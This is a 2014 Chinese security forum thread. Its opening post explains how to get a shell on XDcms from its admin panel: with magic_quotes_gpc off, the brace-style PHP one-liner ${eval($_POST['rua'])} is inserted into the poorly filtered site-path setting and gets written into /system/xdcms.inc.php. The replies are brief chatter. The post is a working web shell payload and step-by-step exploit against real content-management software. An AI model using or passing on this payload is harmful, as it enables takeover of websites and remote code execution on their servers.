XDcms全版本后台getshell

90_ · 发表于 2014-1-24 12:39:48

xdcms后台网站配置基本信息的网站路径处过滤不严，仍可以插一句话拿shell。
前提 magic_quotes_gpc=Off
QQ截图20140124123929.jpg

1.进后台，在基本信息中的网站路径处添加一句话，因为尖括号被转码，但是可以添加花括号型的一句话，${eval($_POST['rua'])}。

2.一句话写入在/system/xdcms.inc.php中。
QQ截图20140124124020.jpg

作者：J_R

blck · 发表于 2014-1-24 12:58:34

沙发，不知名、、、、

Mapleleaves · 发表于 2014-1-24 14:51:53

这是什么cms？

黯然的彷徨 · 发表于 2014-1-26 12:40:16

感觉不明觉厉